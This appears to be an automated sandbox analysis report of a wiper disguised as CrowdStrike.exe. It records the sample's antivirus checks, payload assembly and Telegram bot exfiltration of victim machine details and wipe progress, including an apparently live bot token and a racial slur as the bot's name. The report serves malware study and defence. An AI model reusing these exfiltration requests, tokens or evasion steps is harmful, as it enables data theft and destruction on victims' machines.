Set-Cookie: __cf_bm=1AME0mCoJsK7xoKREJ26ehcq8thkv3AesZXsLDZgpTw-1721553356-1.0.1.1-G8xIvwK9HhtZ6p8crnU7sNzG18MaNQHB7qLyl.p1I9LJgdrOgwdXzYBxdIp3SfmnZDx7jjYGtowAcn_XpaOfHQ; path=/; expires=Sun, 21-Jul-24 09:45:56 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8a6a16e049e40f3a-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 104.16.185.241 | Destination Port: 80 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: Jul 21, 2024 11:16:17.210377932 CEST | Bytes transferred: 63 | Direction: OUT | Data:
GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Timestamp: Jul 21, 2024 11:16:17.679821014 CEST | Bytes transferred: 534 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Sun, 21 Jul 2024 09:16:17 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=82iuoK85y0SNRmNXBBXJNz6KeqPjthJTV_Se29FDoCA-1721553377-1.0.1.1-QMWQvJiVK.Z7y3YE_IuH_W5Lj8i7S_k6Q5CdLep270EhYcj8i_eHD_CV0xbhT46Q09UZNs9hmq7SaXav.HLnvA; path=/; expires=Sun, 21-Jul-24 09:46:17 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8a6a176219f142c3-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 104.16.185.241 | Destination Port: 80 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: Jul 21, 2024 11:16:38.672765017 CEST | Bytes transferred: 63 | Direction: OUT | Data:
GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Timestamp: Jul 21, 2024 11:16:39.141788006 CEST | Bytes transferred: 534 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Sun, 21 Jul 2024 09:16:39 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=E6F3Oqx6oq1PYqb_HIW80EYk_YNmnII_kvi9bRIkexM-1721553399-1.0.1.1-OeArowfGup2qbWoQMCVujjcjpCz0XjK3b_v32m_u5l6aMNkmlNthj3K2APgVzTq8W53fYAz9ZhxNDkWtZzm3ZQ; path=/; expires=Sun, 21-Jul-24 09:46:39 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8a6a17e84d4f7ca5-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 104.16.185.241 | Destination Port: 80 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: Jul 21, 2024 11:16:58.211983919 CEST | Bytes transferred: 39 | Direction: OUT | Data:
GET / HTTP/1.1
Host: icanhazip.com
Timestamp: Jul 21, 2024 11:16:58.519098043 CEST | Bytes transferred: 39 | Direction: OUT | Data:
GET / HTTP/1.1
Host: icanhazip.com
Timestamp: Jul 21, 2024 11:16:59.128463984 CEST | Bytes transferred: 39 | Direction: OUT | Data:
GET / HTTP/1.1
Host: icanhazip.com
Timestamp: Jul 21, 2024 11:17:00.047106028 CEST | Bytes transferred: 534 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Sun, 21 Jul 2024 09:16:59 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=Odn5DOTqwxlDt.RCCpzp58sG7yJKazCHHy9y1oDbjgI-1721553419-1.0.1.1-UNcnF6JxqFL8jjOXZ7RRkXU_OU2U8FCc8MJi9NZ2fMnkVysFveJQ.B.DLzvrCJWj0EbTawNvVv_r0FKSO2PwXQ; path=/; expires=Sun, 21-Jul-24 09:46:59 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8a6a186af8e1421f-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 104.16.185.241 | Destination Port: 80 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: Jul 21, 2024 11:17:22.266679049 CEST | Bytes transferred: 63 | Direction: OUT | Data:
GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Timestamp: Jul 21, 2024 11:17:22.737010002 CEST | Bytes transferred: 534 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Sun, 21 Jul 2024 09:17:22 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=9qoPoK1X8qS12aWV2HXqHk4JFma6Cd3Oi1RZOCGehGw-1721553442-1.0.1.1-t.ZTSKZt7GYUMZzgcC4aygDRyCn5T3U9B5B2WWGIsTFbAOcY231vP3OjHg2yN2nsyTPAAjYXqyd7gSsU8p2ZKQ; path=/; expires=Sun, 21-Jul-24 09:47:22 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8a6a18f8ccb0443e-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: 2024-07-21 09:15:34 UTC | Bytes transferred: 787 | Direction: OUT | Data:
GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Start%20Wipe%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0ADomain%20:user-PC%0D%0AUser%20:user%0D%0AWindows%20Drive%20:C:%5C%0D%0A--------------------%0D%0ADisk%20by%20GB%0D%0AC:%5C%7CFixed%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A-----%0D%0AAllDrive%20=%3E%20Size:223%20Used:55%20Free:168%0D%0A--------------------%0D%0AAmount%20of%20Files%0D%0AWindows%20Drive%20:Other%20Folders%20:115%E2%80%99597%0D%0AUsers%20Folders%20:107%E2%80%99845%0D%0AApp%20Folder%20:40%E2%80%99821%0D%0AWindows%20Folder:98%E2%80%99718%0D%0A-----%0D%0AOther%20Drives%20:0%0D%0A--------------------%0D%0ATime%20:2024/07/21%2005:14:51%0D%0A HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-07-21 09:15:35 UTC | Bytes transferred: 388 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 21 Jul 2024 09:15:34 GMT
Content-Type: application/json
Content-Length: 724
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-07-21 09:15:35 UTC | Bytes transferred: 724 | Direction: IN | Data:
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 33 33 34 2c 22 74 65 78 74 22 3a 22 53 74 61 72 74 20 57 69 70 65 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e 33 33 5c 6e 4d 61 63 68 69 6e 65 20 4e 61 6d 65 20 3a 37 30 31
Data Ascii: {"ok":true,"result":{"message_id":1148,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553334,"text":"Start Wipe \nIP :8.46.123.33\nMachine Name :701


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: 2024-07-21 09:15:57 UTC | Bytes transferred: 310 | Direction: OUT | Data:
GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Other%20Drives%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:0%0D%0ATime%20:2024/07/21%2005:15:56 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-07-21 09:15:57 UTC | Bytes transferred: 388 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 21 Jul 2024 09:15:57 GMT
Content-Type: application/json
Content-Length: 381
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-07-21 09:15:57 UTC | Bytes transferred: 381 | Direction: IN | Data:
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 33 35 37 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 4f 74 68 65 72 20 44 72 69 76 65 73 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e
Data Ascii: {"ok":true,"result":{"message_id":1150,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553357,"text":"Operation Report - Other Drives \nIP :8.46.123.


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: 2024-07-21 09:16:18 UTC | Bytes transferred: 331 | Direction: OUT | Data:
GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Drive%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:115%E2%80%99597%0D%0ATime%20:2024/07/21%2005:16:17%0D%0A HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-07-21 09:16:19 UTC | Bytes transferred: 388 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 21 Jul 2024 09:16:19 GMT
Content-Type: application/json
Content-Length: 393
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-07-21 09:16:19 UTC | Bytes transferred: 393 | Direction: IN | Data:
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 33 37 39 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 57 69 6e 64 6f 77 73 20 44 72 69 76 65 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33
Data Ascii: {"ok":true,"result":{"message_id":1151,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553379,"text":"Operation Report - Windows Drive \nIP :8.46.123


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: 2024-07-21 09:16:39 UTC | Bytes transferred: 330 | Direction: OUT | Data:
GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Users%20Fodler%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0Aundeleted%20Files%20:107%E2%80%99845%0D%0ATime%20:2024/07/21%2005:16:39%0D%0A HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-07-21 09:16:40 UTC | Bytes transferred: 388 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 21 Jul 2024 09:16:40 GMT
Content-Type: application/json
Content-Length: 392
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-07-21 09:16:40 UTC | Bytes transferred: 392 | Direction: IN | Data:
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 34 30 30 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 55 73 65 72 73 20 46 6f 64 6c 65 72 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e
Data Ascii: {"ok":true,"result":{"message_id":1152,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553400,"text":"Operation Report - Users Fodler \nIP :8.46.123.


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: 2024-07-21 09:17:00 UTC | Bytes transferred: 347 | Direction: OUT | Data:
GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20App%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:40%E2%80%99821%0D%0A%D8%B2%D9%85%D8%A7%D9%86%20:2024/07/21%2005:16:59%0D%0A HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-07-21 09:17:01 UTC | Bytes transferred: 388 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 21 Jul 2024 09:17:01 GMT
Content-Type: application/json
Content-Length: 409
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-07-21 09:17:01 UTC | Bytes transferred: 409 | Direction: IN | Data:
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 34 32 31 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 41 70 70 20 46 6f 6c 64 65 72 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: {"ok":true,"result":{"message_id":1153,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553421,"text":"Operation Report - App Folder \nIP :8.46.123.33


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 7904 | Process: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp: 2024-07-21 09:17:23 UTC | Bytes transferred: 331 | Direction: OUT | Data:
GET /bot7277950797:AAF99Nw5rAT1BHnMmwY_tQNYJFU3dYJ5RHc/sendMessage?chat_id=7436061126&text=Operation%20Report%20-%20Windows%20Folder%20%0D%0AIP%20:8.46.123.33%0D%0AMachine%20Name%20:701188%0D%0AUndeleted%20Files%20:98%E2%80%99718%0D%0ATime%20:2024/07/21%2005:17:22%0D%0A HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-07-21 09:17:23 UTC | Bytes transferred: 388 | Direction: IN | Data:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 21 Jul 2024 09:17:23 GMT
Content-Type: application/json
Content-Length: 393
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-07-21 09:17:23 UTC | Bytes transferred: 393 | Direction: IN | Data:
Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 37 37 39 35 30 37 39 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6e 69 67 67 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 73 73 37 38 38 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 36 30 36 31 31 32 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 31 35 35 33 34 34 33 2c 22 74 65 78 74 22 3a 22 4f 70 65 72 61 74 69 6f 6e 20 52 65 70 6f 72 74 20 2d 20 57 69 6e 64 6f 77 73 20 46 6f 6c 64 65 72 20 5c 6e 49 50 20 3a 38 2e 34 36 2e 31 32
Data Ascii: {"ok":true,"result":{"message_id":1154,"from":{"id":7277950797,"is_bot":true,"first_name":"nigger","username":"Css788bot"},"chat":{"id":7436061126,"first_name":".","type":"private"},"date":1721553443,"text":"Operation Report - Windows Folder \nIP :8.46.12


Target ID: 0
Start time: 05:14:00
Start date: 21/07/2024
Path: C:\Users\user\Desktop\CrowdStrike.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\CrowdStrike.exe"
Imagebase: 0x400000
File size: 6'338'272 bytes
MD5 hash: 755C0350038DAEFB29B888B6F8739E81
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 05:14:03
Start date: 21/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                      Target ID:2
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x500000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:05:14:03
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:05:14:04
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:tasklist
                                                                      Imagebase:0x500000
                                                                      File size:79'360 bytes
                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:05:14:04
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c md 564784
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:findstr /V "locatedflatrendsoperating" Ukraine
                                                                      Imagebase:0xdb0000
                                                                      File size:29'696 bytes
                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L
                                                                      Imagebase:0x240000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\564784\Champion.pif
                                                                      Wow64 process (32bit):true
                                                                      Commandline:564784\Champion.pif 564784\L
                                                                      Imagebase:0xde0000
                                                                      File size:893'608 bytes
                                                                      MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 7%, ReversingLabs
                                                                      • Detection: 3%, Virustotal, Browse
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:05:14:05
                                                                      Start date:21/07/2024
                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:timeout 15
                                                                      Imagebase:0x870000
                                                                      File size:25'088 bytes
                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:05:14:37
                                                                      Start date:21/07/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      Imagebase:0x280000
                                                                      File size:65'440 bytes
                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
